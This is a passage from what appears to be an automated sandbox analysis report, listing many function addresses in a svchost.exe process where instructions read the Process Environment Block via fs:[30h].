Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A197 mov eax, dword ptr fs:[00000030h]	9_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03970185 mov eax, dword ptr fs:[00000030h]	9_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EC188 mov eax, dword ptr fs:[00000030h]	9_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EC188 mov eax, dword ptr fs:[00000030h]	9_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D4180 mov eax, dword ptr fs:[00000030h]	9_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D4180 mov eax, dword ptr fs:[00000030h]	9_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A061E5 mov eax, dword ptr fs:[00000030h]	9_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]	9_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	9_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F61C3 mov eax, dword ptr fs:[00000030h]	9_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F61C3 mov eax, dword ptr fs:[00000030h]	9_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039601F8 mov eax, dword ptr fs:[00000030h]	9_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DA118 mov ecx, dword ptr fs:[00000030h]	9_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DA118 mov eax, dword ptr fs:[00000030h]	9_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DA118 mov eax, dword ptr fs:[00000030h]	9_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DA118 mov eax, dword ptr fs:[00000030h]	9_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F0115 mov eax, dword ptr fs:[00000030h]	9_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov ecx, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov ecx, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov ecx, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov eax, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE10E mov ecx, dword ptr fs:[00000030h]	9_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03960124 mov eax, dword ptr fs:[00000030h]	9_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392C156 mov eax, dword ptr fs:[00000030h]	9_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C8158 mov eax, dword ptr fs:[00000030h]	9_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04164 mov eax, dword ptr fs:[00000030h]	9_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04164 mov eax, dword ptr fs:[00000030h]	9_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936154 mov eax, dword ptr fs:[00000030h]	9_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936154 mov eax, dword ptr fs:[00000030h]	9_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C4144 mov eax, dword ptr fs:[00000030h]	9_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C4144 mov eax, dword ptr fs:[00000030h]	9_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C4144 mov ecx, dword ptr fs:[00000030h]	9_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C4144 mov eax, dword ptr fs:[00000030h]	9_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C4144 mov eax, dword ptr fs:[00000030h]	9_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393208A mov eax, dword ptr fs:[00000030h]	9_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F60B8 mov eax, dword ptr fs:[00000030h]	9_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F60B8 mov ecx, dword ptr fs:[00000030h]	9_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039280A0 mov eax, dword ptr fs:[00000030h]	9_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C80A8 mov eax, dword ptr fs:[00000030h]	9_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B20DE mov eax, dword ptr fs:[00000030h]	9_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039720F0 mov ecx, dword ptr fs:[00000030h]	9_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039380E9 mov eax, dword ptr fs:[00000030h]	9_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B60E0 mov eax, dword ptr fs:[00000030h]	9_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E016 mov eax, dword ptr fs:[00000030h]	9_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E016 mov eax, dword ptr fs:[00000030h]	9_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E016 mov eax, dword ptr fs:[00000030h]	9_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E016 mov eax, dword ptr fs:[00000030h]	9_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B4000 mov ecx, dword ptr fs:[00000030h]	9_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000 mov eax, dword ptr fs:[00000030h]	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C6030 mov eax, dword ptr fs:[00000030h]	9_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A020 mov eax, dword ptr fs:[00000030h]	9_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392C020 mov eax, dword ptr fs:[00000030h]	9_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03932050 mov eax, dword ptr fs:[00000030h]	9_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6050 mov eax, dword ptr fs:[00000030h]	9_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395C073 mov eax, dword ptr fs:[00000030h]	9_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D678E mov eax, dword ptr fs:[00000030h]	9_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039307AF mov eax, dword ptr fs:[00000030h]	9_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E47A0 mov eax, dword ptr fs:[00000030h]	9_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393C7C0 mov eax, dword ptr fs:[00000030h]	9_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B07C3 mov eax, dword ptr fs:[00000030h]	9_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039347FB mov eax, dword ptr fs:[00000030h]	9_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039347FB mov eax, dword ptr fs:[00000030h]	9_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039527ED mov eax, dword ptr fs:[00000030h]	9_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039527ED mov eax, dword ptr fs:[00000030h]	9_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039527ED mov eax, dword ptr fs:[00000030h]	9_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BE7E1 mov eax, dword ptr fs:[00000030h]	9_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930710 mov eax, dword ptr fs:[00000030h]	9_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03960710 mov eax, dword ptr fs:[00000030h]	9_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C700 mov eax, dword ptr fs:[00000030h]	9_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396273C mov eax, dword ptr fs:[00000030h]	9_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396273C mov ecx, dword ptr fs:[00000030h]	9_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396273C mov eax, dword ptr fs:[00000030h]	9_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AC730 mov eax, dword ptr fs:[00000030h]	9_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C720 mov eax, dword ptr fs:[00000030h]	9_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C720 mov eax, dword ptr fs:[00000030h]	9_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930750 mov eax, dword ptr fs:[00000030h]	9_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BE75D mov eax, dword ptr fs:[00000030h]	9_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972750 mov eax, dword ptr fs:[00000030h]	9_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972750 mov eax, dword ptr fs:[00000030h]	9_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B4755 mov eax, dword ptr fs:[00000030h]	9_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396674D mov esi, dword ptr fs:[00000030h]	9_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396674D mov eax, dword ptr fs:[00000030h]	9_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396674D mov eax, dword ptr fs:[00000030h]	9_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938770 mov eax, dword ptr fs:[00000030h]	9_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770 mov eax, dword ptr fs:[00000030h]	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03934690 mov eax, dword ptr fs:[00000030h]	9_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03934690 mov eax, dword ptr fs:[00000030h]	9_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039666B0 mov eax, dword ptr fs:[00000030h]	9_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C6A6 mov eax, dword ptr fs:[00000030h]	9_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A6C7 mov eax, dword ptr fs:[00000030h]	9_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	9_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B06F1 mov eax, dword ptr fs:[00000030h]	9_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B06F1 mov eax, dword ptr fs:[00000030h]	9_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972619 mov eax, dword ptr fs:[00000030h]	9_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE609 mov eax, dword ptr fs:[00000030h]	9_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394260B mov eax, dword ptr fs:[00000030h]	9_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E627 mov eax, dword ptr fs:[00000030h]	9_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03966620 mov eax, dword ptr fs:[00000030h]	9_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03968620 mov eax, dword ptr fs:[00000030h]	9_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393262C mov eax, dword ptr fs:[00000030h]	9_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394C640 mov eax, dword ptr fs:[00000030h]	9_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03962674 mov eax, dword ptr fs:[00000030h]	9_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F866E mov eax, dword ptr fs:[00000030h]	9_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F866E mov eax, dword ptr fs:[00000030h]	9_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A660 mov eax, dword ptr fs:[00000030h]	9_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A660 mov eax, dword ptr fs:[00000030h]	9_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E59C mov eax, dword ptr fs:[00000030h]	9_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03932582 mov eax, dword ptr fs:[00000030h]	9_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03932582 mov ecx, dword ptr fs:[00000030h]	9_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03964588 mov eax, dword ptr fs:[00000030h]	9_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039545B1 mov eax, dword ptr fs:[00000030h]	9_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039545B1 mov eax, dword ptr fs:[00000030h]	9_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B05A7 mov eax, dword ptr fs:[00000030h]	9_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B05A7 mov eax, dword ptr fs:[00000030h]	9_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B05A7 mov eax, dword ptr fs:[00000030h]	9_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039365D0 mov eax, dword ptr fs:[00000030h]	9_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E5CF mov eax, dword ptr fs:[00000030h]	9_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E5CF mov eax, dword ptr fs:[00000030h]	9_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039325E0 mov eax, dword ptr fs:[00000030h]	9_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C5ED mov eax, dword ptr fs:[00000030h]	9_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C5ED mov eax, dword ptr fs:[00000030h]	9_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C6500 mov eax, dword ptr fs:[00000030h]	9_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04500 mov eax, dword ptr fs:[00000030h]	9_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535 mov eax, dword ptr fs:[00000030h]	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E53E mov eax, dword ptr fs:[00000030h]	9_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E53E mov eax, dword ptr fs:[00000030h]	9_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E53E mov eax, dword ptr fs:[00000030h]	9_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E53E mov eax, dword ptr fs:[00000030h]	9_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E53E mov eax, dword ptr fs:[00000030h]	9_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938550 mov eax, dword ptr fs:[00000030h]	9_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938550 mov eax, dword ptr fs:[00000030h]	9_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396656A mov eax, dword ptr fs:[00000030h]	9_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396656A mov eax, dword ptr fs:[00000030h]	9_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396656A mov eax, dword ptr fs:[00000030h]	9_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EA49A mov eax, dword ptr fs:[00000030h]	9_2_039EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039644B0 mov ecx, dword ptr fs:[00000030h]	9_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BA4B0 mov eax, dword ptr fs:[00000030h]	9_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039364AB mov eax, dword ptr fs:[00000030h]	9_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039304E5 mov ecx, dword ptr fs:[00000030h]	9_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03968402 mov eax, dword ptr fs:[00000030h]	9_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03968402 mov eax, dword ptr fs:[00000030h]	9_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03968402 mov eax, dword ptr fs:[00000030h]	9_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A430 mov eax, dword ptr fs:[00000030h]	9_2_0396A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E420 mov eax, dword ptr fs:[00000030h]	9_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E420 mov eax, dword ptr fs:[00000030h]	9_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E420 mov eax, dword ptr fs:[00000030h]	9_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392C427 mov eax, dword ptr fs:[00000030h]	9_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B6420 mov eax, dword ptr fs:[00000030h]	9_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EA456 mov eax, dword ptr fs:[00000030h]	9_2_039EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392645D mov eax, dword ptr fs:[00000030h]	9_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395245A mov eax, dword ptr fs:[00000030h]	9_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
